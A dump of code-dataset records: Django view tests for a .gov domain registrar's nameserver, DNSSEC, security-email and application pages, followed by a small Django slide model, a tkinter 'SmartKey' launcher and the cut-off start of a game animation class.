whitespace\n nameservers_page.form[\"form-0-server\"] = nameserver1\n nameservers_page.form[\"form-1-ip\"] = valid_ip\n nameservers_page.form[\"form-1-server\"] = nameserver2\n with less_console_noise(): # swallow log warning message\n result = nameservers_page.form.submit()\n # form submission was a post with an ip address which has been stripped of whitespace,\n # response should be a 302 to success page\n self.assertEqual(result.status_code, 302)\n self.assertEqual(\n result[\"Location\"],\n reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}),\n )\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n page = result.follow()\n # in the event of a generic nameserver error from registry error, there will be a 302\n # with an error message displayed, so need to follow 302 and test for success message\n self.assertContains(page, \"The name servers for this domain have been updated\")\n\n def test_domain_nameservers_form_submit_glue_record_not_allowed(self):\n \"\"\"Nameserver form catches error when IP is present\n but host not subdomain.\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n nameserver1 = \"ns1.igorville.gov\"\n nameserver2 = \"ns2.igorville.com\"\n valid_ip = \"127.0.0.1\"\n # initial nameservers page has one server with two ips\n nameservers_page = self.app.get(reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # attempt to submit the form without two hosts, both subdomains,\n # only one has ips\n nameservers_page.form[\"form-0-server\"] = nameserver1\n nameservers_page.form[\"form-1-server\"] = nameserver2\n nameservers_page.form[\"form-1-ip\"] = valid_ip\n with less_console_noise(): # swallow log warning message\n result = nameservers_page.form.submit()\n # form submission was a post with an error, response should be a 200\n # error text appears twice, once at the top of the page, once around\n # the required field. nameserver has ip but missing host\n self.assertContains(\n result,\n str(NameserverError(code=NameserverErrorCodes.GLUE_RECORD_NOT_ALLOWED)),\n count=2,\n status_code=200,\n )\n\n def test_domain_nameservers_form_submit_invalid_ip(self):\n \"\"\"Nameserver form catches invalid IP on submission.\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n nameserver = \"ns2.igorville.gov\"\n invalid_ip = \"123\"\n # initial nameservers page has one server with two ips\n nameservers_page = self.app.get(reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # attempt to submit the form without two hosts, both subdomains,\n # only one has ips\n nameservers_page.form[\"form-1-server\"] = nameserver\n nameservers_page.form[\"form-1-ip\"] = invalid_ip\n with less_console_noise(): # swallow log warning message\n result = nameservers_page.form.submit()\n # form submission was a post with an error, response should be a 200\n # error text appears twice, once at the top of the page, once around\n # the required field. nameserver has ip but missing host\n self.assertContains(\n result,\n str(NameserverError(code=NameserverErrorCodes.INVALID_IP, nameserver=nameserver)),\n count=2,\n status_code=200,\n )\n\n def test_domain_nameservers_form_submit_invalid_host(self):\n \"\"\"Nameserver form catches invalid host on submission.\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n nameserver = \"invalid-nameserver.gov\"\n valid_ip = \"123.2.45.111\"\n # initial nameservers page has one server with two ips\n nameservers_page = self.app.get(reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # attempt to submit the form without two hosts, both subdomains,\n # only one has ips\n nameservers_page.form[\"form-1-server\"] = nameserver\n nameservers_page.form[\"form-1-ip\"] = valid_ip\n with less_console_noise(): # swallow log warning message\n result = nameservers_page.form.submit()\n # form submission was a post with an error, response should be a 200\n # error text appears twice, once at the top of the page, once around\n # the required field. nameserver has invalid host\n self.assertContains(\n result,\n str(NameserverError(code=NameserverErrorCodes.INVALID_HOST, nameserver=nameserver)),\n count=2,\n status_code=200,\n )\n\n def test_domain_nameservers_form_submits_successfully(self):\n \"\"\"Nameserver form submits successfully with valid input.\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n nameserver1 = \"ns1.igorville.gov\"\n nameserver2 = \"ns2.igorville.gov\"\n valid_ip = \"127.0.0.1\"\n # initial nameservers page has one server with two ips\n nameservers_page = self.app.get(reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # attempt to submit the form without two hosts, both subdomains,\n # only one has ips\n nameservers_page.form[\"form-0-server\"] = nameserver1\n nameservers_page.form[\"form-1-server\"] = nameserver2\n nameservers_page.form[\"form-1-ip\"] = valid_ip\n with less_console_noise(): # swallow log warning message\n result = nameservers_page.form.submit()\n # form submission was a successful post, response should be a 302\n self.assertEqual(result.status_code, 302)\n self.assertEqual(\n result[\"Location\"],\n reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}),\n )\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n page = result.follow()\n self.assertContains(page, \"The name servers for this domain have been updated\")\n\n def test_domain_nameservers_form_invalid(self):\n \"\"\"Nameserver form does not submit with invalid data.\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n nameservers_page = self.app.get(reverse(\"domain-dns-nameservers\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # first two nameservers are required, so if we empty one out we should\n # get a form error\n nameservers_page.form[\"form-0-server\"] = \"\"\n with less_console_noise(): # swallow logged warning message\n result = nameservers_page.form.submit()\n # form submission was a post with an error, response should be a 200\n # error text appears four times, twice at the top of the page,\n # once around each required field.\n self.assertContains(\n result,\n \"A minimum of 2 name servers are required.\",\n count=4,\n status_code=200,\n )\n\n\nclass TestDomainAuthorizingOfficial(TestDomainOverview):\n def test_domain_authorizing_official(self):\n \"\"\"Can load domain's authorizing official page.\"\"\"\n page = self.client.get(reverse(\"domain-authorizing-official\", kwargs={\"pk\": self.domain.id}))\n # once on the sidebar, once in the title\n self.assertContains(page, \"Authorizing official\", count=2)\n\n def test_domain_authorizing_official_content(self):\n \"\"\"Authorizing official information appears on the page.\"\"\"\n self.domain_information.authorizing_official = Contact(first_name=\"Testy\")\n self.domain_information.authorizing_official.save()\n self.domain_information.save()\n page = self.app.get(reverse(\"domain-authorizing-official\", kwargs={\"pk\": self.domain.id}))\n self.assertContains(page, \"Testy\")\n\n\nclass TestDomainOrganization(TestDomainOverview):\n def test_domain_org_name_address(self):\n \"\"\"Can load domain's org name and mailing address page.\"\"\"\n page = self.client.get(reverse(\"domain-org-name-address\", kwargs={\"pk\": self.domain.id}))\n # once on the sidebar, once in the page title, once as H1\n self.assertContains(page, \"Organization name and mailing address\", count=3)\n\n def test_domain_org_name_address_content(self):\n \"\"\"Org name and address information appears on the page.\"\"\"\n self.domain_information.organization_name = \"Town of Igorville\"\n self.domain_information.save()\n page = self.app.get(reverse(\"domain-org-name-address\", kwargs={\"pk\": self.domain.id}))\n self.assertContains(page, \"Town of Igorville\")\n\n def test_domain_org_name_address_form(self):\n \"\"\"Submitting changes works on the org name address page.\"\"\"\n self.domain_information.organization_name = \"Town of Igorville\"\n self.domain_information.save()\n org_name_page = self.app.get(reverse(\"domain-org-name-address\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n\n org_name_page.form[\"organization_name\"] = \"Not igorville\"\n org_name_page.form[\"city\"] = \"Faketown\"\n\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n success_result_page = org_name_page.form.submit()\n self.assertEqual(success_result_page.status_code, 200)\n\n self.assertContains(success_result_page, \"Not igorville\")\n self.assertContains(success_result_page, \"Faketown\")\n\n\nclass TestDomainContactInformation(TestDomainOverview):\n def test_domain_your_contact_information(self):\n \"\"\"Can load domain's your contact information page.\"\"\"\n page = self.client.get(reverse(\"domain-your-contact-information\", kwargs={\"pk\": self.domain.id}))\n self.assertContains(page, \"Your contact information\")\n\n def test_domain_your_contact_information_content(self):\n \"\"\"Logged-in user's contact information appears on the page.\"\"\"\n self.user.contact.first_name = \"Testy\"\n self.user.contact.save()\n page = self.app.get(reverse(\"domain-your-contact-information\", kwargs={\"pk\": self.domain.id}))\n self.assertContains(page, \"Testy\")\n\n\nclass TestDomainSecurityEmail(TestDomainOverview):\n def test_domain_security_email_existing_security_contact(self):\n \"\"\"Can load domain's security email page.\"\"\"\n self.mockSendPatch = patch(\"registrar.models.domain.registry.send\")\n self.mockedSendFunction = self.mockSendPatch.start()\n self.mockedSendFunction.side_effect = self.mockSend\n\n domain_contact, _ = Domain.objects.get_or_create(name=\"freeman.gov\")\n # Add current user to this domain\n _ = UserDomainRole(user=self.user, domain=domain_contact, role=\"admin\").save()\n page = self.client.get(reverse(\"domain-security-email\", kwargs={\"pk\": domain_contact.id}))\n\n # Loads correctly\n self.assertContains(page, \"Security email\")\n self.assertContains(page, \"security@mail.gov\")\n self.mockSendPatch.stop()\n\n def test_domain_security_email_no_security_contact(self):\n \"\"\"Loads a domain with no defined security email.\n We should not show the default.\"\"\"\n self.mockSendPatch = patch(\"registrar.models.domain.registry.send\")\n self.mockedSendFunction = self.mockSendPatch.start()\n self.mockedSendFunction.side_effect = self.mockSend\n\n page = self.client.get(reverse(\"domain-security-email\", kwargs={\"pk\": self.domain.id}))\n\n # Loads correctly\n self.assertContains(page, \"Security email\")\n self.assertNotContains(page, \"dotgov@cisa.dhs.gov\")\n self.mockSendPatch.stop()\n\n def test_domain_security_email(self):\n \"\"\"Can load domain's security email page.\"\"\"\n page = self.client.get(reverse(\"domain-security-email\", kwargs={\"pk\": self.domain.id}))\n self.assertContains(page, \"Security email\")\n\n def test_domain_security_email_form(self):\n \"\"\"Adding a security email works.\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n security_email_page = self.app.get(reverse(\"domain-security-email\", kwargs={\"pk\": self.domain.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n security_email_page.form[\"security_email\"] = \"mayor@igorville.gov\"\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n with less_console_noise(): # swallow log warning message\n result = security_email_page.form.submit()\n self.assertEqual(result.status_code, 302)\n self.assertEqual(\n result[\"Location\"],\n reverse(\"domain-security-email\", kwargs={\"pk\": self.domain.id}),\n )\n\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n success_page = result.follow()\n self.assertContains(success_page, \"The security email for this domain has been updated\")\n\n def test_security_email_form_messages(self):\n \"\"\"\n Test against the success and error messages that are defined in the view\n \"\"\"\n p = \"adminpass\"\n self.client.login(username=\"superuser\", password=p)\n\n form_data_registry_error = {\n \"security_email\": \"test@failCreate.gov\",\n }\n\n form_data_contact_error = {\n \"security_email\": \"test@contactError.gov\",\n }\n\n form_data_success = {\n \"security_email\": \"test@something.gov\",\n }\n\n test_cases = [\n (\n \"RegistryError\",\n form_data_registry_error,\n str(GenericError(code=GenericErrorCodes.CANNOT_CONTACT_REGISTRY)),\n ),\n (\n \"ContactError\",\n form_data_contact_error,\n str(SecurityEmailError(code=SecurityEmailErrorCodes.BAD_DATA)),\n ),\n (\n \"RegistrySuccess\",\n form_data_success,\n \"The security email for this domain has been updated.\",\n ),\n # Add more test cases with different scenarios here\n ]\n\n for test_name, data, expected_message in test_cases:\n response = self.client.post(\n reverse(\"domain-security-email\", kwargs={\"pk\": self.domain.id}),\n data=data,\n follow=True,\n )\n\n # Check the response status code, content, or any other relevant assertions\n self.assertEqual(response.status_code, 200)\n\n # Check if the expected message tag is set\n if test_name == \"RegistryError\" or test_name == \"ContactError\":\n message_tag = \"error\"\n elif test_name == \"RegistrySuccess\":\n message_tag = \"success\"\n else:\n # Handle other cases if needed\n message_tag = \"info\" # Change to the appropriate default\n\n # Check the message tag\n messages = list(response.context[\"messages\"])\n self.assertEqual(len(messages), 1)\n message = messages[0]\n self.assertEqual(message.tags, message_tag)\n self.assertEqual(message.message.strip(), expected_message.strip())\n\n def test_domain_overview_blocked_for_ineligible_user(self):\n \"\"\"We could easily duplicate this test for all domain management\n views, but a single url test should be solid enough since all domain\n management pages share the same permissions class\"\"\"\n self.user.status = User.RESTRICTED\n self.user.save()\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"igorville.gov\")\n with less_console_noise():\n response = self.client.get(reverse(\"domain\", kwargs={\"pk\": self.domain.id}))\n self.assertEqual(response.status_code, 403)\n\n\nclass TestDomainDNSSEC(TestDomainOverview):\n\n \"\"\"MockEPPLib is already inherited.\"\"\"\n\n def test_dnssec_page_refreshes_enable_button(self):\n \"\"\"DNSSEC overview page loads when domain has no DNSSEC data\n and shows a 'Enable DNSSEC' button.\"\"\"\n\n page = self.client.get(reverse(\"domain-dns-dnssec\", kwargs={\"pk\": self.domain.id}))\n self.assertContains(page, \"Enable DNSSEC\")\n\n def test_dnssec_page_loads_with_data_in_domain(self):\n \"\"\"DNSSEC overview page loads when domain has DNSSEC data\n and the template contains a button to disable DNSSEC.\"\"\"\n\n page = self.client.get(reverse(\"domain-dns-dnssec\", kwargs={\"pk\": self.domain_multdsdata.id}))\n self.assertContains(page, \"Disable DNSSEC\")\n\n # Prepare the data for the POST request\n post_data = {\n \"disable_dnssec\": \"Disable DNSSEC\",\n }\n updated_page = self.client.post(\n reverse(\"domain-dns-dnssec\", kwargs={\"pk\": self.domain.id}),\n post_data,\n follow=True,\n )\n\n self.assertEqual(updated_page.status_code, 200)\n\n self.assertContains(updated_page, \"Enable DNSSEC\")\n\n def test_ds_form_loads_with_no_domain_data(self):\n \"\"\"DNSSEC Add DS data page loads when there is no\n domain DNSSEC data and shows a button to Add new record\"\"\"\n\n page = self.client.get(reverse(\"domain-dns-dnssec-dsdata\", kwargs={\"pk\": self.domain_dnssec_none.id}))\n self.assertContains(page, \"You have no DS data added\")\n self.assertContains(page, \"Add new record\")\n\n def test_ds_form_loads_with_ds_data(self):\n \"\"\"DNSSEC Add DS data page loads when there is\n domain DNSSEC DS data and shows the data\"\"\"\n\n page = self.client.get(reverse(\"domain-dns-dnssec-dsdata\", kwargs={\"pk\": self.domain_dsdata.id}))\n self.assertContains(page, \"DS data record 1\")\n\n def test_ds_data_form_modal(self):\n \"\"\"When user clicks on save, a modal pops up.\"\"\"\n add_data_page = self.app.get(reverse(\"domain-dns-dnssec-dsdata\", kwargs={\"pk\": self.domain_dsdata.id}))\n # Assert that a hidden trigger for the modal does not exist.\n # This hidden trigger will pop on the page when certain condition are met:\n # 1) Initial form contained DS data, 2) All data is deleted and form is\n # submitted.\n self.assertNotContains(add_data_page, \"Trigger Disable DNSSEC Modal\")\n # Simulate a delete all data\n form_data = {}\n response = self.client.post(\n reverse(\"domain-dns-dnssec-dsdata\", kwargs={\"pk\": self.domain_dsdata.id}),\n data=form_data,\n )\n self.assertEqual(response.status_code, 200) # Adjust status code as needed\n # Now check to see whether the JS trigger for the modal is present on the page\n self.assertContains(response, \"Trigger Disable DNSSEC Modal\")\n\n def test_ds_data_form_submits(self):\n \"\"\"DS data form submits successfully\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n add_data_page = self.app.get(reverse(\"domain-dns-dnssec-dsdata\", kwargs={\"pk\": self.domain_dsdata.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n with less_console_noise(): # swallow log warning message\n result = add_data_page.forms[0].submit()\n # form submission was a post, response should be a redirect\n self.assertEqual(result.status_code, 302)\n self.assertEqual(\n result[\"Location\"],\n reverse(\"domain-dns-dnssec-dsdata\", kwargs={\"pk\": self.domain_dsdata.id}),\n )\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n page = result.follow()\n self.assertContains(page, \"The DS data records for this domain have been updated.\")\n\n def test_ds_data_form_invalid(self):\n \"\"\"DS data form errors with invalid data (missing required fields)\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n add_data_page = self.app.get(reverse(\"domain-dns-dnssec-dsdata\", kwargs={\"pk\": self.domain_dsdata.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # all four form fields are required, so will test with each blank\n add_data_page.forms[0][\"form-0-key_tag\"] = \"\"\n add_data_page.forms[0][\"form-0-algorithm\"] = \"\"\n add_data_page.forms[0][\"form-0-digest_type\"] = \"\"\n add_data_page.forms[0][\"form-0-digest\"] = \"\"\n with less_console_noise(): # swallow logged warning message\n result = add_data_page.forms[0].submit()\n # form submission was a post with an error, response should be a 200\n # error text appears twice, once at the top of the page, once around\n # the field.\n self.assertContains(result, \"Key tag is required\", count=2, status_code=200)\n self.assertContains(result, \"Algorithm is required\", count=2, status_code=200)\n self.assertContains(result, \"Digest type is required\", count=2, status_code=200)\n self.assertContains(result, \"Digest is required\", count=2, status_code=200)\n\n def test_ds_data_form_invalid_keytag(self):\n \"\"\"DS data form errors with invalid data (key tag too large)\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n add_data_page = self.app.get(reverse(\"domain-dns-dnssec-dsdata\", kwargs={\"pk\": self.domain_dsdata.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # first two nameservers are required, so if we empty one out we should\n # get a form error\n add_data_page.forms[0][\"form-0-key_tag\"] = \"65536\" # > 65535\n add_data_page.forms[0][\"form-0-algorithm\"] = \"\"\n add_data_page.forms[0][\"form-0-digest_type\"] = \"\"\n add_data_page.forms[0][\"form-0-digest\"] = \"\"\n with less_console_noise(): # swallow logged warning message\n result = add_data_page.forms[0].submit()\n # form submission was a post with an error, response should be a 200\n # error text appears twice, once at the top of the page, once around\n # the field.\n self.assertContains(\n result, str(DsDataError(code=DsDataErrorCodes.INVALID_KEYTAG_SIZE)), count=2, status_code=200\n )\n\n def test_ds_data_form_invalid_digest_chars(self):\n \"\"\"DS data form errors with invalid data (digest contains non hexadecimal chars)\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n add_data_page = self.app.get(reverse(\"domain-dns-dnssec-dsdata\", kwargs={\"pk\": self.domain_dsdata.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # first two nameservers are required, so if we empty one out we should\n # get a form error\n add_data_page.forms[0][\"form-0-key_tag\"] = \"1234\"\n add_data_page.forms[0][\"form-0-algorithm\"] = \"3\"\n add_data_page.forms[0][\"form-0-digest_type\"] = \"1\"\n add_data_page.forms[0][\"form-0-digest\"] = \"GG1234\"\n with less_console_noise(): # swallow logged warning message\n result = add_data_page.forms[0].submit()\n # form submission was a post with an error, response should be a 200\n # error text appears twice, once at the top of the page, once around\n # the field.\n self.assertContains(\n result, str(DsDataError(code=DsDataErrorCodes.INVALID_DIGEST_CHARS)), count=2, status_code=200\n )\n\n def test_ds_data_form_invalid_digest_sha1(self):\n \"\"\"DS data form errors with invalid data (digest is invalid sha-1)\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n add_data_page = self.app.get(reverse(\"domain-dns-dnssec-dsdata\", kwargs={\"pk\": self.domain_dsdata.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # first two nameservers are required, so if we empty one out we should\n # get a form error\n add_data_page.forms[0][\"form-0-key_tag\"] = \"1234\"\n add_data_page.forms[0][\"form-0-algorithm\"] = \"3\"\n add_data_page.forms[0][\"form-0-digest_type\"] = \"1\" # SHA-1\n add_data_page.forms[0][\"form-0-digest\"] = \"A123\"\n with less_console_noise(): # swallow logged warning message\n result = add_data_page.forms[0].submit()\n # form submission was a post with an error, response should be a 200\n # error text appears twice, once at the top of the page, once around\n # the field.\n self.assertContains(\n result, str(DsDataError(code=DsDataErrorCodes.INVALID_DIGEST_SHA1)), count=2, status_code=200\n )\n\n def test_ds_data_form_invalid_digest_sha256(self):\n \"\"\"DS data form errors with invalid data (digest is invalid sha-256)\n\n Uses self.app WebTest because we need to interact with forms.\n \"\"\"\n add_data_page = self.app.get(reverse(\"domain-dns-dnssec-dsdata\", kwargs={\"pk\": self.domain_dsdata.id}))\n session_id = self.app.cookies[settings.SESSION_COOKIE_NAME]\n self.app.set_cookie(settings.SESSION_COOKIE_NAME, session_id)\n # first two nameservers are required, so if we empty one out we should\n # get a form error\n add_data_page.forms[0][\"form-0-key_tag\"] = \"1234\"\n add_data_page.forms[0][\"form-0-algorithm\"] = \"3\"\n add_data_page.forms[0][\"form-0-digest_type\"] = \"2\" # SHA-256\n add_data_page.forms[0][\"form-0-digest\"] = \"GG1234\"\n with less_console_noise(): # swallow logged warning message\n result = add_data_page.forms[0].submit()\n # form submission was a post with an error, response should be a 200\n # error text appears twice, once at the top of the page, once around\n # the field.\n self.assertContains(\n result, str(DsDataError(code=DsDataErrorCodes.INVALID_DIGEST_SHA256)), count=2, status_code=200\n )\n\n\nclass TestApplicationStatus(TestWithUser, WebTest):\n def setUp(self):\n super().setUp()\n self.app.set_user(self.user.username)\n self.client.force_login(self.user)\n\n def test_application_status(self):\n \"\"\"Checking application status page\"\"\"\n application = completed_application(status=DomainApplication.ApplicationStatus.SUBMITTED, user=self.user)\n application.save()\n\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"city.gov\")\n # click the \"Manage\" link\n detail_page = home_page.click(\"Manage\", index=0)\n self.assertContains(detail_page, \"city.gov\")\n self.assertContains(detail_page, \"city1.gov\")\n self.assertContains(detail_page, \"Chief Tester\")\n self.assertContains(detail_page, \"testy@town.com\")\n self.assertContains(detail_page, \"Admin Tester\")\n self.assertContains(detail_page, \"Status:\")\n\n def test_application_status_with_ineligible_user(self):\n \"\"\"Checking application status page whith a blocked user.\n The user should still have access to view.\"\"\"\n self.user.status = \"ineligible\"\n self.user.save()\n\n application = completed_application(status=DomainApplication.ApplicationStatus.SUBMITTED, user=self.user)\n application.save()\n\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"city.gov\")\n # click the \"Manage\" link\n detail_page = home_page.click(\"Manage\", index=0)\n self.assertContains(detail_page, \"city.gov\")\n self.assertContains(detail_page, \"Chief Tester\")\n self.assertContains(detail_page, \"testy@town.com\")\n self.assertContains(detail_page, \"Admin Tester\")\n self.assertContains(detail_page, \"Status:\")\n\n def test_application_withdraw(self):\n \"\"\"Checking application status page\"\"\"\n application = completed_application(status=DomainApplication.ApplicationStatus.SUBMITTED, user=self.user)\n application.save()\n\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"city.gov\")\n # click the \"Manage\" link\n detail_page = home_page.click(\"Manage\", index=0)\n self.assertContains(detail_page, \"city.gov\")\n self.assertContains(detail_page, \"city1.gov\")\n self.assertContains(detail_page, \"Chief Tester\")\n self.assertContains(detail_page, \"testy@town.com\")\n self.assertContains(detail_page, \"Admin Tester\")\n self.assertContains(detail_page, \"Status:\")\n # click the \"Withdraw request\" button\n withdraw_page = detail_page.click(\"Withdraw request\")\n self.assertContains(withdraw_page, \"Withdraw request for\")\n home_page = withdraw_page.click(\"Withdraw request\")\n # confirm that it has redirected, and the status has been updated to withdrawn\n self.assertRedirects(\n home_page,\n \"/\",\n status_code=302,\n target_status_code=200,\n fetch_redirect_response=True,\n )\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"Withdrawn\")\n\n def test_application_withdraw_no_permissions(self):\n \"\"\"Can't withdraw applications as a restricted user.\"\"\"\n self.user.status = User.RESTRICTED\n self.user.save()\n application = completed_application(status=DomainApplication.ApplicationStatus.SUBMITTED, user=self.user)\n application.save()\n\n home_page = self.app.get(\"/\")\n self.assertContains(home_page, \"city.gov\")\n # click the \"Manage\" link\n detail_page = home_page.click(\"Manage\", index=0)\n self.assertContains(detail_page, \"city.gov\")\n self.assertContains(detail_page, \"city1.gov\")\n self.assertContains(detail_page, \"Chief Tester\")\n self.assertContains(detail_page, \"testy@town.com\")\n self.assertContains(detail_page, \"Admin Tester\")\n self.assertContains(detail_page, \"Status:\")\n # Restricted user trying to withdraw results in 403 error\n with less_console_noise():\n for url_name in [\n \"application-withdraw-confirmation\",\n \"application-withdrawn\",\n ]:\n with self.subTest(url_name=url_name):\n page = self.client.get(reverse(url_name, kwargs={\"pk\": application.pk}))\n self.assertEqual(page.status_code, 403)\n\n def test_application_status_no_permissions(self):\n \"\"\"Can't access applications without being the creator.\"\"\"\n application = completed_application(status=DomainApplication.ApplicationStatus.SUBMITTED, user=self.user)\n other_user = User()\n other_user.save()\n application.creator = other_user\n application.save()\n\n # PermissionDeniedErrors make lots of noise in test output\n with less_console_noise():\n for url_name in [\n \"application-status\",\n \"application-withdraw-confirmation\",\n \"application-withdrawn\",\n ]:\n with self.subTest(url_name=url_name):\n page = self.client.get(reverse(url_name, kwargs={\"pk\": application.pk}))\n self.assertEqual(page.status_code, 403)\n\n def test_approved_application_not_in_active_requests(self):\n \"\"\"An approved application is not shown in the Active\n Requests table on home.html.\"\"\"\n application = completed_application(status=DomainApplication.ApplicationStatus.APPROVED, user=self.user)\n application.save()\n\n home_page = self.app.get(\"/\")\n # This works in our test environment because creating\n # an approved application here does not generate a\n # domain object, so we do not expect to see 'city.gov'\n # in either the Domains or Requests tables.\n self.assertNotContains(home_page, \"city.gov\")\n","repo_name":"cisagov/manage.get.gov","sub_path":"src/registrar/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":109579,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"67"} +{"seq_id":"25073007563","text":"from django.db import models\n\n\nclass Group(models.Model):\n \"\"\"Объединяем слайды для главной страницы в группы, для удобства редактирования и хранения\"\"\"\n name = models.CharField(verbose_name='Название группы', max_length=50)\n\n class Meta:\n verbose_name = 'Группа слайдов'\n verbose_name_plural = 'Группы слайдов'\n ordering = ['name']\n\n def __str__(self):\n return self.name\n\n\nclass Slide(models.Model):\n \"\"\"Слайды на главной странице сайта\"\"\"\n\n slide_group = models.ForeignKey(Group, on_delete=models.DO_NOTHING)\n slide_img = models.ImageField(verbose_name='Изображение слайда', upload_to='index/slide/')\n slide_description = models.TextField(verbose_name='Текст / Описание (h2 / p)', blank=True, null=True)\n slide_link_name = models.CharField(verbose_name='Название кнопки', blank=True, null=True, max_length=100,\n default='Перейти')\n slide_link_url = models.CharField(verbose_name='Ссылка', blank=True, null=True, max_length=250)\n slide_order = models.IntegerField(verbose_name='Порядок', default='0')\n slide_visible = models.BooleanField(verbose_name='Показывать?', default=True)\n\n class Meta:\n ordering = ['slide_group', 'slide_order', 'id']\n verbose_name = 'Слайд'\n verbose_name_plural = 'Слайды'\n\n def __str__(self):\n return f'Слайд {self.id}'\n","repo_name":"sergio-kzn/derevo116.ru","sub_path":"Index/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73069118934","text":"import tkinter as tk\n\nfrom resources.button_panel import ButtonPanel\nfrom resources.smartdatabase import SmartKeyDatabase\n\n\nclass App:\n def __init__(\n self,\n ):\n self.root = tk.Tk()\n self.root.title(\"SmartKey\")\n self.root.minsize(750, 600)\n\n # DATABASE\n\n smart_key_db = SmartKeyDatabase()\n smart_key_db.create_table()\n\n try:\n smart_key_db.add_admin_user()\n except Exception:\n error_label = tk.Label(\n self.root,\n text=\"Dogodila se greska sa databazom\".upper(),\n fg=\"red\",\n font=(\"System\", 20),\n )\n error_label.pack()\n else:\n # BUTTONS PANEL\n self.buttons_panel = tk.LabelFrame(self.root, text=\"Buttons Panel\")\n\n self.button_frame = ButtonPanel(self.buttons_panel, self.root)\n self.button_frame.frame.pack(fill=\"both\", expand=True)\n\n self.buttons_panel.pack(expand=True, fill=\"x\", side=\"top\")\n\n\nif __name__ == \"__main__\":\n app = App()\n app.root.mainloop()\n","repo_name":"ivegoie/SmartKey-PYM3","sub_path":"smartkey.py","file_name":"smartkey.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8134669360","text":"'''\r\nCreated on 11 dec. 2013\r\n\r\n@author: efarhan\r\n'''\r\nimport os\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\n\r\nfrom engine.const import CONST, log\r\nfrom json_export.json_main import get_element\r\nfrom engine.vector import Vector2\r\nfrom render_engine.img_manager import img_manager\r\n\r\n\r\nclass Animation():\r\n def __init__(self,obj):\r\n self.obj = obj\r\n self.img = None\r\n self.path = \"\"\r\n self.root_path = self.path\r\n self.state_range = {}\r\n self.path_list = []\r\n self.state = \"\"\r\n self.anim_counter = 0\r\n self.anim_freq = CONST.animation_step\r\n self.img_indexes = []\r\n self.index = 0\r\n\r\n def load_images(self,size=None,tmp = False):\r\n self.img_indexes = []\r\n \r\n for p in self.path_list:\r\n \r\n path = CONST.path_prefix+self.root_path+p\r\n files = []\r\n if \".png\" in path:\r\n files = [path]\r\n else:\r\n files = [ os.path.join(path, f) for f in listdir(path) if (isfile(join(path, f)) and f.find(\".png\") != -1) ]\r\n files.sort()\r\n for f in files:\r\n self.img_indexes.append(img_manager.load_image(f,tmp))\r\n try:\r\n self.img = self.img_indexes[0]\r\n except IndexError:\r\n pass\r\n if size is None:\r\n self.size = img_manager.get_size(self.img)\r\n else:\r\n self.size = Vector2(size)\r\n if self.obj:\r\n self.obj.update_rect()\r\n\r\n def update_animation(self,state=\"\",invert=False,lock=False):\r\n if state != \"\":\r\n self.state = state\r\n if self.anim_counter == 